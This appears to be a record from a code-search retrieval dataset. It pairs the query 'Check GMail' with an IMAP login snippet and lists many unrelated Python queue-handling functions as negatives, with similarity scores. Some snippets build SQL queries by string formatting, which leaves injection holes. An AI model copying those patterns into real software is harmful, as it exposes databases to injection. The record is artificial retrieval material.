message['job_type'] != 'MAINTAIN' and message['job_type'] != 'UPDATE':\n raise ValueError('{} is not a recognized task type'.format(message['job_type']))\n pass\n\n # Query all repos with repo url of given task\n repoUrlSQL = s.sql.text(\"\"\"\n SELECT min(repo_id) as repo_id FROM repo WHERE repo_git = '{}'\n \"\"\".format(message['given']['github_url']))\n repo_id = int(pd.read_sql(repoUrlSQL, self.db, params={}).iloc[0]['repo_id'])\n\n try:\n if message['models'][0] == 'pull_requests':\n self.pull_requests_model(message, repo_id)\n elif message['models'][0] == 'pull_request_commits':\n self.pull_request_commits_model(message, repo_id)\n elif message['models'][0] == 'pull_request_files':\n self.pull_requests_graphql(message, repo_id)\n except Exception as e:\n register_task_failure(self, message, repo_id, e)\n pass", "def runQueueEnqueue(self):\n raise NotImplementedError", "def collect(self):\n while True:\n if not self._queue.empty():\n message = self._queue.get()\n self.working_on = message['job_type']\n else:\n break\n logging.info(\"Popped off message: {}\\n\".format(str(message)))\n\n if message['job_type'] == 'STOP':\n break\n\n if message['job_type'] != 'MAINTAIN' and message['job_type'] != 'UPDATE':\n raise ValueError('{} is not a recognized task type'.format(message['job_type']))\n pass\n\n \"\"\" Query all repos with repo url of given task \"\"\"\n repoUrlSQL = s.sql.text(\"\"\"\n SELECT min(repo_id) as repo_id FROM repo WHERE repo_git = '{}'\n \"\"\".format(message['given']['git_url']))\n repo_id = int(pd.read_sql(repoUrlSQL, self.db, params={}).iloc[0]['repo_id'])\n\n try:\n if message['models'][0] == 'badges':\n self.badges_model(message, repo_id)\n except Exception as e:\n register_task_failure(self, logging, message, repo_id, e)\n pass", "def load_queue(self, queue=None):\n if not queue:\n return False\n elif queue == \"ready_queue\":\n table = \"tangerine\"\n condition = \" WHERE state='ready';\"\n elif queue == \"job_queue\":\n table = \"jobs\"\n condition = \"\"\n else:\n table = \"tangerine\"\n condition = \"\"\n \n cur = self.conn.cursor()\n cur.execute(\"LOCK TABLE \" + queue + \" IN ACCESS EXCLUSIVE MODE;\")\n \n cur.execute(\"SELECT COUNT(id) FROM \" + queue + \";\")\n\n # if the queue still has tasks return nothing\n if cur.fetchone()[0]:\n self.conn.rollback()\n else:\n cur.execute(\"SELECT COUNT(id) FROM \" + table + condition + \";\")\n\n # If the task table is empty return nothing\n if not cur.fetchone()[0]:\n self.conn.commit()\n return\n \n cur.execute(\"SELECT id FROM \" + table + condition + \";\")\n ids = (\"(\" + str(id[0]) + \")\" for id in cur.fetchall())\n cur.execute(\"INSERT INTO \" + queue + \" VALUES \" + \", \".join(ids) + \";\")\n self.conn.commit()", "def _update(self, data):\n if len(data) > 0:\n for q in self._queues.values():\n q.put(data)", "def last_buy(self):\n multi_data = []\n while not self.infoQueue.empty():\n multi_data.append(self.infoQueue.get_nowait())\n self.redisHandle.set_multiple_data(multi_data)\n print(\"flush all data\")", "def test_queue_integration(self):\n from solariat_bottle.settings import LOGGER\n from solariat_bottle.db.channel.twitter import TwitterServiceChannel\n from solariat_bottle.db.historic_data import QueuedHistoricData\n from solariat_bottle.db.post.base import Post\n from solariat_bottle.daemons.twitter.historics.timeline_request import \\\n DirectMessagesRequest, SentDirectMessagesRequest, SearchRequest, UserTimelineRequest\n from solariat_bottle.db.user_profiles.user_profile import UserProfile\n\n # reduce amount of data for long-running integration test\n FakeTwitterApi.SEARCH_DATA_LENGTH = 50\n FakeTwitterApi.TIMELINE_DATA_LENGTH = 50\n FakeTwitterApi.DM_DATA_LENGTH = 50\n FakeTwitterApi.DM_SENT_DATA_LENGTH = 50\n FakeTwitterApi.ALL_DATA_LENGTH = 200\n FakeTwitterApi.CREATED_FROM = FakeTwitterApi.CREATED_TO - timedelta(days=1)\n FakeTwitterApi.init_next_params()\n SearchRequest.SEARCH_LIMIT = 10\n UserTimelineRequest.FETCH_LIMIT = 20\n DirectMessagesRequest.DIRECT_MESSAGES_LIMIT = 20\n SentDirectMessagesRequest.DIRECT_MESSAGES_LIMIT = 20\n\n profile = UserProfile.objects.upsert('Twitter', profile_data=dict(user_name='jarvis', user_id='99188210'))\n channel = TwitterServiceChannel.objects.create_by_user(self.user, title='SC')\n channel.add_username(profile.user_name)\n channel.add_keyword(u'keywörd')\n\n def get_id_date_pair(post_data):\n if 'twitter' in post_data:\n post_data = post_data['twitter']\n return int(post_data['id']), post_data['created_at']\n\n fetched_data = []\n def _save_tweets(fn):\n def decorated(tweets, *args, **kwargs):\n LOGGER.debug('PUSH_POSTS, len:%s', len(tweets))\n fetched_data.extend([get_id_date_pair(t) for t in tweets])\n return fn(tweets, *args, **kwargs)\n return decorated\n\n queued_data = []\n def _save_queued_data(method):\n def _method(*args, **kwargs):\n queued_data[:] = [\n get_id_date_pair(i.solariat_post_data) for i in\n QueuedHistoricData.objects(subscription=subscription)\n ]\n LOGGER.debug('QUEUED_POSTS, len: %s', len(queued_data))\n self.assertTrue(len(queued_data) == FakeTwitterApi.ALL_DATA_LENGTH,\n msg=\"len=%d %s\" % (len(queued_data), queued_data))\n self.assertEqual(set(queued_data), set(fetched_data),\n msg=u\"\\nqueued =%s\\nfetched=%s\" % (queued_data, fetched_data))\n return method(*args, **kwargs)\n return _method\n\n subscription = TwitterRestHistoricalSubscription.objects.create(\n created_by=self.user,\n channel_id=channel.id,\n from_date=FakeTwitterApi.CREATED_FROM,\n to_date=FakeTwitterApi.CREATED_TO\n )\n subscriber = TwitterHistoricsSubscriber(subscription)\n subscriber.push_posts = _save_tweets(subscriber.push_posts)\n subscriber.historic_loader.load = _save_queued_data(subscriber.historic_loader.load)\n\n subscriber.start_historic_load()\n self.assertEqual(subscriber.get_status(), SUBSCRIPTION_FINISHED)\n\n self.assertEqual(Post.objects(channels__in=[\n subscription.channel.inbound,\n subscription.channel.outbound]).count(), FakeTwitterApi.ALL_DATA_LENGTH)\n\n SearchRequest.SEARCH_LIMIT = 100\n UserTimelineRequest.FETCH_LIMIT = 200\n DirectMessagesRequest.DIRECT_MESSAGES_LIMIT = 200\n SentDirectMessagesRequest.DIRECT_MESSAGES_LIMIT = 200", "def dequeue(self):", "def write_data(self,queue):\n raise NotImplementedError('Abstract method has not been implemented')", "async def queue(self, msg, song):\n title1 = await Downloader.get_info(self, url=song)\n title = title1[0]\n data = title1[1]\n # NOTE:needs fix here\n if data['queue']:\n await self.playlist(data, msg)\n # NOTE: needs to be embeded to make it better output\n return await msg.send(f\"Added playlist {data['title']} to queue\")\n self.player[msg.guild.id]['queue'].append(\n {'title': title, 'author': msg})\n return await msg.send(f\"**{title} added to queue**\".title())", "def _put(self, item, queue):", "def __init__(self):\n self.queues=[]", "async def playlist(self, data, msg):\n for i in data['queue']:\n print(i)\n self.player[msg.guild.id]['queue'].append(\n {'title': i, 'author': msg})", "def process_queued_msg(self):\n try:\n while not self.queue.empty():\n port, tbl = self.queue.get()\n reveived_port = self.switches[port.neighbor_switch_dpid].ports[port.neighbor_port_no]\n self.tbl.update_by_neighbor(reveived_port, port, tbl)\n self.deploy_routing_table()\n except:\n pass", "def creator(data, q):\n print('Creating data and putting it on the queue')\n for item in data:\n q.put(item)", "def declare(self):\n self.channel.queue_declare(queue='files_to_database')", "def __init__(self):\n self.data = Queue()", "def get_from_queue(self):\n while not self.receive_queue.empty():\n cmd, kwargs = bcp.decode_command_string(\n self.receive_queue.get(False))\n self._process_command(cmd, **kwargs)", "def ztest_sql_queue(self):\n \n sql_queue = SQLQueue()\n \n #insertion\n for i in range(10):\n item = NMSQueueItem(5,\"data %s\" % (i))\n item.set_uuid()\n sql_queue.put(item.dictify())\n \n size = sql_queue.size()\n \n while size != 0:\n the_dict = sql_queue.pop()\n item = NMSQueueItem.create_from_dict(the_dict)\n print(\"size = %d, item = %s\\n\" % (size, item))\n size = sql_queue.size()\n \n print(\"size = %s\" % size )", "def add_to_queue(self, name, pic_num, crop_num):\n #if the picture is not already in the queue\n #and if it is not already downloaded\n if ((self.communicator.image_store.get_crop(pic_num, crop_num).inqueue == False) & \\\n (self.communicator.image_store.get_crop(pic_num, crop_num).completed == False)):\n #insert in queue\n myiter = self.list_store.append(None)\n #set the data in column 0\n #if the picture is ready for download set color to black\n if (self.communicator.image_store.get_crop(pic_num, crop_num).available == True):\n self.list_store.set_value(myiter, \\\n 0, '<span foreground=\"#000000\"><b>' + name + '</b></span>')\n #otherwise set to gray\n else:\n self.list_store.set_value(myiter, \\\n 0, '<span foreground=\"#A0A0A0\"><b>' + name + '</b></span>')\n #set the data in column 1 and 2\n self.list_store.set_value(myiter, 1, pic_num)\n self.list_store.set_value(myiter, 2, crop_num)\n #let model know picture is inqueue\n self.communicator.image_store.get_crop(pic_num, crop_num).inqueue = True\n #call queue_changed function\n self.queue_changed()\n elif self.communicator.image_store.get_crop(pic_num, crop_num).completed == True:\n print \"image has already been downloaded\"\n else:\n print \"image is currently in the queue\"", "def __init__(self): \n self.queue = []", "def run(self):\n while True :\n try:\n instance_id = os.getenv(\"CF_INSTANCE_INDEX\")\n mydict = db.hgetall(application_name)\n if instance_id not in mydict :\n self.queue.put(instance_id)\n except :\n pass\n finally:\n pass", "def __init__(self):\r\n self.queue = []", "def __init__(self):\r\n self.queue = []", "def add_queue(self, queue):\n\n queue_id = queue[\"ovsdb:queues\"][0][\"queue-id\"]\n self.queue_dict[queue_id] = queue", "def queue (self):\n\n with self.__t.steps():\n import exception\n from lib import schema\n from lib import common\n from lib import process\n from lib import data\n from sqlalchemy import and_\n import json\n from collections import OrderedDict\n\n with schema.select(\"process_queue\", schema.table.process_queue.status==None) as select:\n for queued in select.limit(1000).all():\n blocked = False\n if len(queued.depend) > 0:\n for depend_id in queued.depend:\n depend = schema.select_one(\"series\", schema.table.series.id==depend_id)\n match_tags = json.dumps(OrderedDict(sorted(data.decode_tags(depend.tags).items())))\n if depend and schema.select_one(\"process_queue\", schema.table.process_queue.tags==match_tags):\n blocked = True\n break # queued dependencies\n if not blocked:\n queued.status = \"queued\"\n schema.save(queued)\n run.apply_async([queued.tags]) #queue process\n self.__t.ok()\n self.apply_async(queue=\"control\", countdown=30) #queue next", "def enqueue(self, server_id, url, title, duration, user):\n srv = self.get_server_dict(server_id)\n srv['queue'].append( (url, title, duration, user) )", "def run(self) -> None:\n while self.data_incoming or len(self._queue):\n if not self._queue:\n logging.info(\"Consumer %d is sleeping since queue is empty\", self._name)\n time.sleep(0.75)\n print(self._queue.get())\n time.sleep(0.5)", "def submit_to_queue(queue_df, conn, table_name):\n queue_df.to_sql(con=conn, name=table_name, if_exists='replace', index=False)\n print 'Inserted ' + str(len(queue_df)) + ' records to the task_queue'", "def __init__(self):\n self.queue = []", "def __init__(self):\n self.queue = []", "def __init__(self):\n self.queue = []", "def __init__(self):\n self.queue = []", "def __init__(self):\n self.queue = []", "def dump_queue(self):\n self.set_polling_many(self.queue)\n self.queue = []", "def __init__(self):\n self.queue = []\n self.queue.append(Queue())\n self.queue.append(Queue())\n self.tag = 0 # using to record which queue contain the data", "def put(self, conn):\r\n self.queue.append((conn, time.time()))", "def service_queue(queue, result_id, dut, dut_id):\n mdb = get_autotest()\n ldb = get_logging()\n count = 0\n while 1:\n mesg =queue.get()\n if mesg == 'finish':\n print >>sys.stderr, '[logged %d lines to %s for %s]' % (\n count, result_id, dut)\n break\n (ts, kind, message) = mesg\n count += 1\n if type(message) ==type(''):\n message = unicode(message, encoding='utf8')\n if type(kind) == type(''):\n kind = unicode(kind, encoding = 'utf8')\n handle = '%s_%d_%f_%s' % (dut if dut else dut_id, count, ts, HOSTNAME)\n \n terms = {'message':message, 'kind': kind, 'time': ts, '_id': handle}\n if dut_id:\n terms['dut_id'] = dut_id\n if dut:\n terms['dut_name'] = dut\n if result_id:\n terms['result_id'] = result_id\n if kind in ['HEADLINE', 'RESULT'] and result_id and dut:\n rdoc = mdb.results.find_one({'_id':result_id})\n if rdoc:\n build = rdoc.get('build')\n if build:\n set_build_information(build, \n {'test_status': [ts, dut, message]})\n else:\n print 'no build for headline'\n else:\n print 'no result for headline'\n ldb.logs.save(terms)", "def _enqueue_task(self):\n\t\t# TODO(bslatkin): Remove these retries when they're not needed in userland.\n\t\tRETRIES = 3\n\t\ttarget_queue = os.environ.get('X_APPENGINE_QUEUENAME', constants.FEED_QUEUE)\n\t\tfor i in xrange(RETRIES):\n\t\t\ttry:\n\t\t\t\ttaskqueue.Task(\n\t\t\t\t\t\turl='/work/pull_feeds',\n\t\t\t\t\t\teta=self.eta,\n\t\t\t\t\t\tparams={'topic': self.topic}\n\t\t\t\t\t\t).add(target_queue)\n\t\t\texcept (taskqueue.Error, apiproxy_errors.Error):\n\t\t\t\tlogging.exception('Could not insert task to fetch topic = %s',\n\t\t\t\t\t\t\t\t\t\t\t\t\tself.topic)\n\t\t\t\tif i == (RETRIES - 1):\n\t\t\t\t\traise\n\t\t\telse:\n\t\t\t\treturn", "def dequeue(self):\n pass", "def dequeue(self):\n pass", "def read_queue(self):\n query = \"\"\"SELECT server,\n otp,\n modified,\n info,\n server_nonce\n FROM queue\"\"\"\n self._execute(query)\n return self._dictfetchall()", "def add_to_queue(self, items):\n\n for i in items:\n self.r.rpush(self.joblist, i)", "def auto_import_product_queue_line_data(self):\n # change by bhavesh jadav 03/12/2019 for process only one queue data at a time\n query = \"\"\"select product_data_queue_id from shopify_product_data_queue_line_ept where state='draft' ORDER BY create_date ASC limit 1\"\"\"\n self._cr.execute(query)\n product_data_queue_id = self._cr.fetchone()\n product_data_queue_line_ids = self.env['shopify.product.data.queue.ept'].browse(product_data_queue_id).product_data_queue_lines\n product_data_queue_line_ids.process_product_queue_line_data()", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def run(self, to_process, duplicates):\n self.db_m = database_manager.DatabaseManager(self.settings)\n try:\n # Process queue while is not empty\n while True:\n data = to_process.get(True, 1)\n duplicate_count = self.consume_data(data)\n with duplicates.get_lock():\n duplicates.value += duplicate_count\n except queue.Empty:\n pass", "def run(self):\n\n def callback(ch, method, properties, body):\n json_body = json.loads(body)\n self.buffer.append(Fvalue.fromdict(json_body))\n\n sleep(5) # We introduce a slight delay to let the RabbitMQ container to accept connections\n connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.mq_host,port=self.mq_port))\n channel = connection.channel()\n channel.exchange_declare(exchange=self.mq_host + '_exchange', exchange_type='direct')\n result = channel.queue_declare(exclusive=True)\n queue_name = result.method.queue\n channel.queue_bind(exchange=self.mq_host + '_exchange',\n queue=queue_name,\n routing_key=self.routing_key)\n channel.basic_consume(callback,queue=queue_name,no_ack=True)\n channel.start_consuming()", "def q_mgr(HyS, HyQ):\r\n q_file = os.path.join(HyS.var_dir, 'Queue.txt')\r\n while True:\r\n run = ''\r\n lines = open(q_file, 'r').readlines()\r\n if lines:\r\n run = lines[0].rstrip()\r\n open(q_file, 'w').writelines(lines[1:])\r\n if run:\r\n HyQ.put(run)\r\n else:\r\n break\r\n return True", "def update_one_queue(queue):\n conn = pbs.pbs_connect(queue.server.name.encode('iso-8859-1', 'replace'))\n if conn==-1:\n logging.error(\"Cannot connect to %s - live data will be missing\" % server.name)\n return\n statqueues = pbs.pbs_statque(conn, queue.name.encode('iso-8859-1', 'replace') , [], \"\")\n pbs.pbs_disconnect(conn)\n if len(statqueues)==0:\n logging.error(\"pbs_statque failed for queue: %s\" % queue.name)\n return\n if len(statqueues)>1:\n logging.warning(\"pbs_statque returned more than one records for queue: %s\" % queue.name)\n\n attr_dict = dict([ (x.name,x.value) for x in statqueues[0].attribs])\n update_one_queue_from_pbs_data(queue, attr_dict)\n queue.save()", "def queue_parse():\n if not check_api_auth():\n abort(401) # Unauthorized.\n\n # Get the scan_result from the query.\n try:\n # Grab the data from the body of the request\n scan_result = request.data.decode('utf-8')\n # Add the data to the queue\n new_parse = ParseQueue()\n new_parse.parse_data = scan_result\n with open('/tmp/%i' + time.strftime(\"%Y%m%d-%H%M%S\"), 'w') as f:\n f.write(json.dumps(json.loads(scan_result), indent=4))\n db.session.add(new_parse)\n db.session.commit()\n parse_scan.apply_async(args=[new_parse.id])\n return json.dumps({\"status\": \"success\"})\n except:\n # Could not load the scan_result from the query.\n db.session.rollback()\n abort(400) # Bad request.", "def pull(self):", "def run(self):\n\t\tlogger.info(\"Uploading data... @ %f, PID: %d\" % (time.time(), os.getpid()))\n\n\t\tself.dump_db()", "def _get_data(self):\n while True:\n # self.logger.debug(\"data queue size is: {}\".format(len(self._dataqueue)))\n ans = self._parser.find_first_packet(self._dataqueue[:])\n if ans:\n self._dataqueue = ans[1]\n # self.logger.debug(\"found packet of size {}\".format(len(ans[0])))\n return ans[0]\n else:\n # self.logger.debug(\"Could not find packet in received data\")\n tmp = self.conn.recv(1024)\n self._dataqueue += tmp", "def process_queue(self, queue):\n\n while queue:\n deferred, data = queue.popleft()\n deferred.callback(data)", "def pop_message(self):\n app_process = sqlite3.connect('app_process::memory:', check_same_thread=False)\n app_process_cursor = app_process.cursor()\n app_process_cursor.execute(\"SELECT * FROM message_queue WHERE tstamp==(:first)\", {\"first\":self.mq_first}) \n item = app_process_cursor.fetchone()\n if item == None:\n return\n app_process_cursor.execute(\"DELETE FROM message_queue WHERE tstamp==(:first)\", {\"first\":self.mq_first})\n self.mq_first = item[4] #now sets first to next item pointed to\n app_process.commit()\n app_process.close()\n return item", "def _pull_batch_from_queue(self):\n rollout = self.explorer.queue.get( timeout = 600.0 )\n while not rollout.terminal:\n try: \n rollout.extend( self.explorer.queue.get_nowait() )\n except queue.Empty:\n break\n print(rollout.size())\n return rollout", "def enqueue(self,e):", "def process_amqp_events(self):\n self.connection.process_data_events()", "def put_data(self, id, data):\n self.msg_queue.put(data)", "def get(self):\n return dumps(AQ.queue()), 200", "def __init__(self):\n self.queue = Queue()", "def __init__(self):\n self._queue_items = []", "def get_data(self):\n try:\n data = self._queue.get(block=False)\n except Empty:\n data = None\n return data", "def get_queue_data():\n global grove_data\n try:\n grove_data = grove_queue.get_nowait()\n except Empty:\n # Just use old loopstate if queue is empty\n pass\n return grove_data", "def process_twitter_data(worker_id, queue, module_name, source):\n\n logger = logging.getLogger(LOGGING_ROOT_NAME + '.processor.' + str(worker_id))\n logger.debug(\"Worker\" + str(worker_id) + \" looking for data...\")\n\n db_access = MongoDBUtils()\n\n while True:\n data = queue.get()\n if 'text' in data:\n # Guarda el Tweet\n db_access.save_tweet(data, source)\n #print data\n print \"Tweet guardado...\"\n logger.debug('TWEET | id: ' + str(data['id']) + ': ' + data['text'].encode('utf-8'))\n elif 'delete' in data:\n logger.debug('DELETION NOTICE | ' + str(data).encode('utf-8'))\n elif 'warning' in data:\n logger.debug('STALL WARNING | ' + str(data).encode('utf-8'))\n elif 'limit' in data:\n logger.debug('LIMIT NOTICE | ' + str(data).encode('utf-8'))\n elif 'disconnect' in data:\n logger.debug('DISCONNECTION MESSAGE | ' + str(data).encode('utf-8'))\n elif 'status_withheld' in data:\n logger.debug('STATUS WITHHELD | ' + str(data).encode('utf-8'))\n elif 'user_withheld' in data:\n logger.debug('USER WITHHELD | ' + str(data).encode('utf-8'))\n else:\n logger.debug('PRETTY ODD | Data: ' + str(data))\n\n queue.task_done()", "def __init__(self):\n self._data_queue = []\n self._access_queue_lock = Lock()", "def run():\r\n num_workers = g.num_query_queue_workers\r\n wq = WorkQueue(num_workers = num_workers)\r\n wq.start()\r\n\r\n while True:\r\n job = None\r\n #limit the total number of jobs in the WorkQueue. we don't\r\n #need to load the entire db queue right away (the db queue can\r\n #get quite large).\r\n if len(running) < 2 * num_workers:\r\n with running_lock:\r\n iden, pickled_cr = get_query()\r\n if pickled_cr is not None:\r\n if not iden in running:\r\n running.add(iden)\r\n job = make_query_job(iden, pickled_cr)\r\n wq.add(job)\r\n\r\n #if we didn't find a job, sleep before trying again\r\n if not job:\r\n time.sleep(1)", "def add_to_send_queue(self, data):\n if self.socket is not None:\n self.send_queue.put(data)", "def test_the_queue_enqueue(the_queue):\n the_queue.enqueue(2)\n assert the_queue._new_dll.head.data == the_queue._new_dll.tail.data == 2", "def add_to_queue(self, msg):\n if not self.queue.full():\n self.queue.put(msg)", "def add_queue(self, queue):\n with self.mutex:\n self.queues.append(queue)", "def get_data(queue, item_count):\n return [loads(queue.get()) for _ in range(item_count)]", "def data_generator():\n msg = Message(Message.ADD, queue.uuid, queue)\n PROVIDER_MQ.put(msg)\n keep_running = True\n while keep_running:\n try:\n chunk = queue.get()\n yield chunk\n except Empty:\n app.logger.info('Queue empty. Ending stream')\n keep_running = False", "def queueStatusAll():", "def ztest_tokyo_queue(self):\n \n sql_queue = TokyoCabinetQueue()\n \n print(\"Queue size = %d\\n\" %(sql_queue.size()) )\n \n #insertion\n for i in range(10):\n if i % 2 == 0:\n p = 0\n else:\n p = 1\n item = NMSQueueItem(p,\"data %s\" % (i))\n item.set_uuid()\n sql_queue.put(item.dictify())\n #time.sleep(0.5)\n \n size = sql_queue.size()\n \n while size != 0:\n the_dict = sql_queue.pop()\n item = NMSQueueItem.create_from_dict(the_dict)\n print(\"size = %d, item = %s\\n\" % (size, item))\n size = sql_queue.size()\n \n print(\"size = %s\" % size )", "def enqueue(self, data, flag='process'):\n self.Q['in'].put((data, flag))", "def _push_data_to_learner(self, data_queue):\n raise NotImplementedError", "def populatereadyqueue():\n readyQueue.put(Process(\"P1\", time(0, 0, 1), time(0, 0, 4)))\n readyQueue.put(Process(\"P2\", time(0, 0, 2), time(0, 0, 6)))\n readyQueue.put(Process(\"P3\", time(0, 0, 3), time(0, 0, 2)))", "def _drain_queue(self):\n while self.queue:\n self._export_batch()" ]
[ "0.6866185", "0.6528412", "0.65014994", "0.6360959", "0.6359229", "0.6332785", "0.6331364", "0.63042796", "0.62166846", "0.621502", "0.6206312", "0.618142", "0.61665404", "0.6134651", "0.61273587", "0.61071765", "0.6074403", "0.60732526", "0.6055935", "0.6055481", "0.60451365", "0.60388917", "0.60382074", "0.6038119", "0.6025687", "0.6020988", "0.60091877", "0.5973509", "0.59556293", "0.59497714", "0.594634", "0.594634", "0.59394556", "0.59237266", "0.59226185", "0.59195524", "0.5909843", "0.5890745", "0.5890745", "0.5890745", "0.5890745", "0.5890745", "0.5878202", "0.58695644", "0.5865342", "0.5851911", "0.584633", "0.5841693", "0.5841693", "0.5827866", "0.5823142", "0.5815476", "0.58141327", "0.58141327", "0.58141327", "0.58141327", "0.58141327", "0.58141327", "0.58141327", "0.58141327", "0.58141327", "0.58141327", "0.58141327", "0.58141327", "0.58141327", "0.58141327", "0.58141327", "0.5812663", "0.58063555", "0.57995206", "0.5799422", "0.5799236", "0.57920575", "0.5791401", "0.578701", "0.5769021", "0.57560354", "0.5748083", "0.57386625", "0.5736158", "0.5734419", "0.5732206", "0.5729424", "0.5726838", "0.57254964", "0.5720633", "0.5719781", "0.5714445", "0.5713835", "0.5705625", "0.5703547", "0.56974953", "0.5691603", "0.56757826", "0.56570953", "0.5654848", "0.5641112", "0.5615507", "0.5609424", "0.5604924", "0.56025857" ]
0.0
-1
Check GMail E.g. messages,unseen = imap.check_gmail('username.com','password')
def check_gmail(username, password): i = imaplib.IMAP4_SSL('imap.gmail.com') try: i.login(username, password) x, y = i.status('INBOX', '(MESSAGES UNSEEN)') messages = int(re.search('MESSAGES\s+(\d+)', y[0]).group(1)) unseen = int(re.search('UNSEEN\s+(\d+)', y[0]).group(1)) return messages, unseen except: return False, 0
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def checkEmail():\n\tpop_conn = poplib.POP3_SSL('pop.gmail.com')\n\tpop_conn.user('')\n\tpop_conn.pass_('')\n\t#Get messages from server:\n\tmessages = [pop_conn.retr(i) for i in range(1, len(pop_conn.list()[1]) + 1)]\n\t# Concat message pieces:\n\tmessages = [\"\\n\".join(mssg[1]) for mssg in messages]\n\t#Parse message intom an email object:\n\tmessages = [parser.Parser().parsestr(mssg) for mssg in messages]\n\tflag = 0\n\tsweep = None\n\tfor message in messages:\n\t\tsubject = message['subject']\n\t\tif subject is None:\n\t\t\tcontinue\n\t\telif \"CommenceSweep:\" in subject:\n\t\t\tstart = subject.find(\":\")\n\t\t\tcommand = subject[start+1:]\n\t\t\tprint command\n\t\t\tif \"Comp\"+sys.argv[1] in command:\n\t\t\t\tstart = command.find(\"-\")\n\t\t\t\tsweep = command[start+1:]\n\t\t\t\tprint sweep\n\t\t\t\tpoplist = pop_conn.list()\n\t\t\t\tmsglist = poplist[1]\n\t\t\t\tfor msgspec in msglist:\n\t\t\t\t\tdelete = int(msgspec.split(' ')[0])\n\t\t\t\t\tpop_conn.dele(delete)\n\t\t\t\tflag = 1\n\tpop_conn.quit()\n\treturn flag, sweep", "def check_email():\n server = smtplib.SMTP(\"smtp.gmail.com\", 587)\n server.ehlo()\n server.starttls()\n server.ehlo()\n server.login(user, password)\n\n g = gmail.login(user, password)\n\n # Check for unread messages.\n unread = g.inbox().mail(unread=True)\n\n # Submit a job to lint each email sent to editor@proselint.com. Record the\n # resulting job_ids somewhere (in Redis, I suppose), keyed by a hash of the\n # email.\n for u in unread:\n\n u.fetch()\n\n signature = (u.fr.decode('utf-8') +\n u.subject.decode('utf-8') +\n u.body.decode('utf-8'))\n\n hash = hashlib.sha256(signature.encode('utf-8')).hexdigest()\n\n if user_to in u.to or user_to in u.headers.get('Cc', []):\n\n job_id = conn.get(hash)\n\n if not job_id:\n # If the email hasn't been sent for processing, send it.\n r = requests.post(api_url, data={\"text\": u.body})\n conn.set(hash, r.json()[\"job_id\"])\n print(\"Email {} sent for processing.\".format(hash))\n\n else:\n # Otherwise, check whether the results are ready, and if so,\n # reply with them.\n r = requests.get(api_url, params={\"job_id\": job_id})\n\n if r.json()[\"status\"] == \"success\":\n\n reply = quoted(u.body)\n errors = r.json()['data']['errors']\n reply += \"\\r\\n\\r\\n\".join([json.dumps(e) for e in errors])\n\n msg = MIMEMultipart()\n msg[\"From\"] = \"{} <{}>\".format(name, user)\n msg[\"To\"] = u.fr\n msg[\"Subject\"] = \"Re: \" + u.subject\n\n if u.headers.get('Message-ID'):\n msg.add_header(\"In-Reply-To\", u.headers['Message-ID'])\n msg.add_header(\"References\", u.headers['Message-ID'])\n\n body = reply + \"\\r\\n\\r\\n--\\r\\n\" + tagline + \"\\r\\n\" + url\n msg.attach(MIMEText(body, \"plain\"))\n\n text = msg.as_string()\n server.sendmail(user, u.fr, text)\n\n # Mark the email as read.\n u.read()\n u.archive()\n\n print(\"Email {} has been replied to.\".format(hash))", "def check_for_new_data():\n SCOPES = ['https://mail.google.com/']\n creds = None\n # The file token.json stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.json'):\n creds = Credentials.from_authorized_user_file('token.json', SCOPES)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file('creds_4.json', SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.json', 'w') as token:\n token.write(creds.to_json())\n\n service = build('gmail', 'v1', credentials=creds)\n stamp = int(time.time()) - 3600\n # Call the Gmail API\n results = service.users().messages().list(userId='me',q=f\"from:notify@google.com after:{stamp}\").execute()\n if results[\"resultSizeEstimate\"] > 0:\n populate_database()", "def main():\r\n credentials = get_credentials()\r\n http = credentials.authorize(httplib2.Http())\r\n service = discovery.build('gmail', 'v1', http=http)\r\n\r\n response = service.users().messages().list(userId=USER_ID, labelIds=[\"SPAM\"]).execute()\r\n messages = []\r\n if 'messages' in response:\r\n messages.extend(response['messages'])\r\n\r\n while 'nextPageToken' in response:\r\n page_token = response['nextPageToken']\r\n response = service.users().messages().list(userId=USER_ID, labelIds=[\"SPAM\"], pageToken=page_token).execute()\r\n messages.extend(response['messages'])\r\n\r\n i = 0\r\n for message in messages:\r\n msg_id = message[\"id\"]\r\n message = service.users().messages().get(userId=USER_ID, id=msg_id).execute()\r\n for prop in message[\"payload\"][\"headers\"]:\r\n if prop[\"name\"] == \"From\":\r\n print(\"ID:\", i, \"\\tFrom:\", prop[\"value\"].encode('ascii','replace'), end=\"\\t\")\r\n elif prop[\"name\"] == \"Subject\":\r\n print(\"Subject:\", prop[\"value\"].encode('ascii','replace'))\r\n i += 1\r\n\r\n to_keep = raw_input(\"Do you want to keep any emails? [N / 0,1,...] \")\r\n if \",\" in to_keep:\r\n to_keep = to_keep.split(\",\")\r\n for i in range(len(to_keep)):\r\n to_keep[i] = int(to_keep[i])\r\n elif to_keep != \"N\":\r\n to_keep = [int(to_keep)]\r\n\r\n if isinstance(to_keep, list):\r\n for i in range(len(to_keep)-1,-1,-1):\r\n msg_labels = {'removeLabelIds': [\"SPAM\"], 'addLabelIds': [\"INBOX\"]}\r\n msg_id = messages[to_keep[i]][\"id\"]\r\n message = service.users().messages().modify(userId=USER_ID, id=msg_id, body=msg_labels).execute()\r\n del messages[to_keep[i]]\r\n\r\n # ANe1BmiDP-rAoJSwkw8T119UU0Z7oisOlVJ4xQ\r\n # filter0 = service.users().settings().filters().get(userId=USER_ID, id=\"ANe1BmiDP-rAoJSwkw8T119UU0Z7oisOlVJ4xQ\").execute()\r\n # print(filter0)\r\n\r\n for message in messages:\r\n msg_id = message[\"id\"]\r\n # for prop in message[\"payload\"][\"headers\"]:\r\n # 